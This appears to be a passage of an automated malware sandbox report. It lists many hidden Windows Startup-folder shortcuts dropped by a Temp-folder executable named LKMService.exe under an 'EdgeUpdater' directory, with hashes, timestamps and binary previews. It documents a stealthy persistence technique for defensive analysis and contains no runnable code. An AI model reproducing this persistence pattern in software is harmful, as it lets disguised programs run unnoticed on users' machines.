=...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a2af4b412d214fd6bad4a26d9e0b3459.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:51 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.946355334851872
Encrypted:	false
SSDEEP:	24:8PreA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Preer0R5rRvggyF
MD5:	7FEE1D34F7063EFEA71254FFE218B74E
SHA1:	2937BFCD365AAB3C5950CF61838D2A6B1710D8FE
SHA-256:	1B20F35EB892C29821CEB39C19B633252772C7D178E53228C846F77144228560
SHA-512:	9F7B0D080C00C1F721ACF92F8B0AEF07DC6B862F09967ECC388F49DFE35466ADA2009EACD6B2FC5F725EF16B6CDD15540A1F9047993A6100C0D07C3C031886BD
Malicious:	false
Preview:	L..................F...."...o.k.....p......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a2fbd2562a9c47f3bb321728d45174fd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:42 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949469891434896
Encrypted:	false
SSDEEP:	24:8Py2A3pd+E0RAgKerRNglhW8Apfv/42eVvqyFm:8Py2er0RBrRvggyF
MD5:	6D66EBC04483E084213D49702AB15EB2
SHA1:	9B73657D5700F748AA18F7B6D928F8E0C841ACC1
SHA-256:	6A15744E48F76E7B84BDBA063F21DA3D9851CE2CB05AC1BD8775B9385D41ED50
SHA-512:	2312089622A74D4092676D1D5AF5402239DD5E7F66D81E171DBDA53BF452A8C2632DAABB6BFCAADDECFD806611B14743CFFDB3E444871C5006BA08C829B4F85E
Malicious:	false
Preview:	L..................F...."...o.k....}.4......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY6=..Temp..:......CW.^BY6=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a3a675ab04a6462c94d522f4f1c91070.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:43 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.951620171102949
Encrypted:	false
SSDEEP:	24:8PjhA3pd+E0RAgKeIIHRNglhW8Apfv/42eVvqyFm:8PVer0RrrRvggyF
MD5:	B22737D27E1BE94F7EDABA5A2841195C
SHA1:	A5F78673D8E3AB2FEEE6795659A6B9063A186982
SHA-256:	C44D2A8D6B2462E34515FAFB1C3799B1AA7EFDDC7CA670796CEE0C3498FC488E
SHA-512:	40536E53E793400878E9F5683C212D6305E6305D64668FE26CBD8603449C8FE89CE862225FE450B2C7E5165376D5E49898ED8D56D0746BC4AA1B6802C9F76BBA
Malicious:	false
Preview:	L..................F...."...o.k....c......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY6=..Temp..:......CW.^BY6=....l.....................'Q..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a3d8e8caf5b74e1cb5d1e08eff83d042.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:37 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.951876922831946
Encrypted:	false
SSDEEP:	24:8P0Opd+E0R9gKWtHRNglhW8Apfv/42eVvqyFm:8P0Or0RM1rRvggyF
MD5:	F1C811521567922DE515530DC7E68213
SHA1:	9A8B6111AF608881E0B0ADFE230BFF997A872EC3
SHA-256:	9DABFCCBF4AF5C2E3FA0AA988CD60EF99F1D3A564A69B7CC4467832B186FC317
SHA-512:	EEC6AB139E3CDDDDBE5E05B98EC0B5EDCB77C0657573473646E00F9D54346647E0D3928498E7453CFCCD18A83EF2A1212C399E5E717806E4B69CB0CC40546850
Malicious:	false
Preview:	L..................F...."...o.k....f........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYS=..Temp..:......CW.^BYS=....l......................(2.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a4af370eb77c4c9cbd5018d7ca0099cf.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:48 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953470652844799
Encrypted:	false
SSDEEP:	24:8PxOpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PxOr0ROOxrRvggyF
MD5:	E91D09AFE964BB37934EF72379B10D05
SHA1:	9A12C2BC0D7D550BCFCE01F5030C2741560F8FD4
SHA-256:	F34337B2E8B5BD717FA3A9713EA6767AACB01F61964CBA4392C71A7E2B9FE17B
SHA-512:	94D20EB2EACDC32195BFC2DE2220DD774453F8A30BC140318B01EDC7438399F7B4CA873E08235073649CCE0716EEE6D10DB9CDB3081C9B338194549B96160775
Malicious:	false
Preview:	L..................F...."...o.k....M3.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a6923064572e4ccd84c26c55d63b860b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:01 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953153037406711
Encrypted:	false
SSDEEP:	24:8PmA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Pmer0R5rRvggyF
MD5:	AE202A93879179602FC95044E58C15A0
SHA1:	D6A620BFA8D0D3EC0E1B921183543471D0020DB4
SHA-256:	DD3262E1486F950FD2053D065D02AFDE96A54CA0855806ECB210B7B79681B589
SHA-512:	29060743315E371D8EAF40F2F9182893E5805351AA2DD471168CE1A03F1FCC794E25091AC163E73EB42C22D2660EA83665FDC52F41F3C7441ED3439CE353669D
Malicious:	false
Preview:	L..................F...."...o.k.....n_......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a8b8f27eee314951801c76543389daea.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:14 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.957566592954458
Encrypted:	false
SSDEEP:	24:8PTA3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8PTer0RSrRvggyF
MD5:	A63F2E17577FED6E9C575C50932294CE
SHA1:	8F65A6C74CEED5C26826B125871A2B18ABE87592
SHA-256:	479D724C086708E6C0037694C48ECF01D0067555179FB42887E52A567CDF17FF
SHA-512:	35F9E2F46792FF4EBEA9B7D0956EF3422DF9FC860997C9CB3B0483EEE07F52DA86931DA9AD411733AFEC2C47F155985499BFC24B9FB7AE9E3B5395AEC5411A93
Malicious:	false
Preview:	L..................F...."...o.k......u.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ad5a2e4eb7754943b8e09f14b44ac581.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:12 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.950828237826827
Encrypted:	false
SSDEEP:	24:8PbA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Pber0R5rRvggyF
MD5:	CE6247AC29ADEAF104F2D3575D589650
SHA1:	0887007A63F415F078A02F94EF6DAAD14CE1D01B
SHA-256:	9CEB153CA0013E73D31E2B71EE11938CEE624958543430E6BB9E8FE3B76783F6
SHA-512:	AD848EEA4F348960A3BD806BF537394EDBC0A79FEB425E545C0B9FEE96511C08307C53A49DC9CC65788C85BD457BACB810D492A1E9FAEFCF0F6CD7A81918D147
Malicious:	false
Preview:	L..................F...."...o.k......+......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b0ff61a4a4e74ce692b605ad60c163cf.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:36 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.961942467205397
Encrypted:	false
SSDEEP:	24:8P+5Opd+E0R9gKERNglhW8Apfv/42eVvqyFm:8P+5Or0R2rRvggyF
MD5:	B50E5FA87577A290F49791658C5A6826
SHA1:	F67C483F460B5DF4E3B9CDE68677ABBE39B16D8A
SHA-256:	FC2FC6EB768680C0FFCFFC86A9F392BF777F0945BA89AE39EDE857E6A6F74FC5
SHA-512:	613BCEFC5AE35FCF4D6E35D9916AF73885F5549006E3AD7E67B5A93AF2C90F23ED345EDE5572CDE74DDCD8DB7652AD477B016DC6D8BB5BDE0E7733F260445F25
Malicious:	false
Preview:	L..................F...."...o.k......_......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYS=..Temp..:......CW.^BYS=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b1529c818a6142048f9d94321c16100a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:40 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9474821904882935
Encrypted:	false
SSDEEP:	24:8PyA3pd+E0RzgK1RNglhW8Apfv/42eVvqyFm:8Pyer0RprRvggyF
MD5:	06D64705DF4777EF0694125FB9D50DA9
SHA1:	F93D6517CB5629EB1B20312B8469D966C82C7C37
SHA-256:	F3882177911DD0F0A8D3D7BECE93206481B1D2155CC80360EED49EC9A9D57695
SHA-512:	54764173EAB972F3C1147E4326F1B37B352BC6F167AF0285EF1DBD0428DE12E845016CF218063DB03780B5EBB3D83D2499D51E5544A4E9624A33639BBEB51267
Malicious:	false
Preview:	L..................F...."...o.k...."v.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY5=..Temp..:......CW.^BY5=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b1bb960a8ae34663bada21b1c0393545.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:12 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948847320350728
Encrypted:	false
SSDEEP:	24:8PZA3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8PZer0RSrRvggyF
MD5:	5524CE8BE94945EC50905C01E4143357
SHA1:	603B2663C4F6F72D9CB4032CC4B4DA9FC21D30B3
SHA-256:	33BF274C7A8FC27B59FE98DCAE944C325FD483B83E9E81637E3EE913DA30D75C
SHA-512:	ED76B40FE30FB75ED8D3EBA684DACBDD6C6F50DF00696C10352FA33FB647700829F46A172D5E5372C753716BEBEFA3418781025B9487BF488F9E703E63BB6F11
Malicious:	false
Preview:	L..................F...."...o.k....,.1t.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b20fe93fb8224c49992e3fa4f8b36e84.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:29 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.965478862636066
Encrypted:	false
SSDEEP:	24:8PkYOpd+E0RhgKj8RNglhW8Apfv/42eVvqyFm:8PLOr0RurRvggyF
MD5:	7D60864ECF63DA606D1F9B7BA82BADD1
SHA1:	B46F8C374C08CE9E04486CFB31B5FFA242FA540A
SHA-256:	FC791A066C049AB196692E5E3005A249E59F35B27795626216F6F700B0BE35F5
SHA-512:	F71A640D005EBFC3163A73342116CC415F9A0DA1507EAC8DE54ADC5CAD8730EC100A57CC94D097E7C3905AF2C6CA144B0DC4A7EDE974A84E0B258DB22F883599
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYO=..Temp..:......CW.^BYO=....l.....................;.].T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b291156501f24c94aaf7f55cd06df300.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:34 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.943397987128156
Encrypted:	false
SSDEEP:	24:8PVA3pd+E0RkgKTRNglhW8Apfv/42eVvqyFm:8PVer0RorRvggyF
MD5:	987EE214CB121A6C775659A229AFA620
SHA1:	38E41D319C2207E47FBD0B675BADED9BA13A12D7
SHA-256:	61CA0B3C68326A852251448AB458FC5A2E040C87720222000FB8BFBD25312196
SHA-512:	5C5FA0592077B127BBB5DAEDAA313177BE32825B7824F6156D80FF2B66F5E9E1B8C61E7D34AD75D19AFB65AC094A63C630F30D48095C25521B5FB3545443458F
Malicious:	false
Preview:	L..................F...."...o.k....d........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY2=..Temp..:......CW.^BY2=....l.....................&...T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_be70b80cff144530b83ef3b2b31e8af9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:43:01 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953255455825639
Encrypted:	false
